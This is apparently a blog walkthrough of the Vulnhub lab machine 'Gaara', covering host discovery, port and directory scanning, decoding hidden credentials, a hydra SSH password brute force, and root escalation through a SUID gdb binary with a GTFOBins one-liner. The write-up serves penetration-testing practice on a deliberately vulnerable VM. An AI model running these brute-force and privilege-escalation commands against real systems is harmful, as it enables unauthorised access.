Gaara by 0xJin is an easy machine from Vulnhub. However, there are some rabbit holes alongside. Also, I have tested this machine on VirtualBox. “Gaara Walkthrough – Vulnhub – Writeup”.
Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/
Crossroads Walkthrough – Vulnhub – Writeup
Identify the target
As usual, we have to identify the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Next, we have to scan the open ports on the target machine.
nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62
This is a simple machine that has HTTP and SSH services available.
Enumerate the web server
The default page had an image and nothing more.
Thus, we have to try bruteforcing the directories.
gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log
There is an interesting path that we need to check.
There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.
curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more
The path /iamGaara gave me an encoded text that I could decrypt using Cyber Chef. We can see that the text has lowercase and numbers (1,9), we can confirm this is not Base32. Testing for Base58 gave me credentials.
However, this didn’t work on the SSH server. But still, we have a username to bruteforce password.
hydra -l gaara -P /home/kali/rockyou.txt 10.0.2.62 ssh
Finally, I got a password. Then, I got the shell access of the user.
ssh [email protected]
Root privilege escalation
On the directory, there is a file Kazekage.txt that has a path. This is a rabbit hole, but let’s see.
On the directory, there is a secret file.
There is a brainf*ck encoded text that reads the following.
Next, I checked the SUID binaries on the system.
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
The binary gdb had setuid permissions. Hence, we can do privilege escalation from here.
Reference: https://gtfobins.github.io/gtfobins/gdb/#suid
gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
Finally, we got the bash shell with root access. Next, we have the root flag.